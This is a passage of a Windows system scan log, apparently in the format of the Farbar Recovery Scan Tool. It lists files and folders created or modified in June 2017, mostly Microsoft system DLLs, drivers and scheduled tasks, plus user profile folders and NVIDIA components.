2017-06-08 09:54 - 2017-06-08 09:54 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-06-08 09:54 - 2017-06-08 09:54 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-06-08 09:54 - 2017-06-08 09:54 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-06-08 09:54 - 2017-06-08 09:54 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-06-08 09:54 - 2017-06-08 09:54 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-06-08 09:54 - 2017-06-08 09:54 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-06-08 09:54 - 2017-06-08 09:54 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00000000 ____D C:\Windows.old
2017-06-08 09:51 - 2017-06-08 09:51 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-06-08 09:51 - 2017-06-08 08:58 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-06-08 09:48 - 2017-06-08 09:48 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\msmq
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\MSBuild
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\inetpub
2017-06-08 09:48 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-06-08 09:48 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-06-08 09:17 - 2017-06-08 09:17 - 00000000 ____D C:\ProgramData\USOShared
2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagwrn.xml
2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagerr.xml
2017-06-08 09:08 - 2017-07-02 20:17 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-06-08 09:08 - 2017-06-08 09:08 - 00003760 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2017-06-08 09:08 - 2017-06-08 09:08 - 00003536 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2017-06-08 09:08 - 2017-06-08 09:08 - 00003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-06-08 09:08 - 2017-06-08 09:08 - 00003404 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-06-08 09:08 - 2017-06-08 09:08 - 00003118 _____ C:\WINDOWS\System32\Tasks\Intel PTT EK Recertification
2017-06-08 09:08 - 2017-06-08 09:08 - 00002340 _____ C:\WINDOWS\System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A}
2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_LENOVO_MICPKEY
2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2}
2017-06-08 09:08 - 2017-06-08 09:08 - 00002306 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_Dolby
2017-06-08 09:08 - 2017-06-08 09:08 - 00002280 _____ C:\WINDOWS\System32\Tasks\RTKCPL
2017-06-08 09:08 - 2017-06-08 09:08 - 00002274 _____ C:\WINDOWS\System32\Tasks\DolbySelectorTask
2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD
2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\Lenovo
2017-06-08 09:05 - 2017-06-08 09:05 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-06-08 09:01 - 2017-06-08 09:06 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-06-08 09:01 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2017-06-08 09:00 - 2017-07-02 20:23 - 02324546 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-06-08 09:00 - 2017-07-02 20:17 - 00000000 ____D C:\ProgramData\Synaptics
2017-06-08 09:00 - 2017-06-30 07:49 - 00000000 ____D C:\Users\ararat
2017-06-08 09:00 - 2017-06-08 09:07 - 00000000 ____D C:\Users\DefaultAppPool
2017-06-08 09:00 - 2017-06-08 09:00 - 02011386 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Vorlagen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Startmenü
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Netzwerkumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Lokale Einstellungen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Eigene Dateien
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Druckumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Videos
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Musik
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Bilder
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Verlauf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WUDFUsbccidDriver_01_11_00.Wdf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_wbf_vfs_lvcmn_01_11_00.Wdf
2017-06-08 09:00 - 2017-05-01 22:51 - 06437312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 02479552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00548800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00146880 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\oemdspif.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
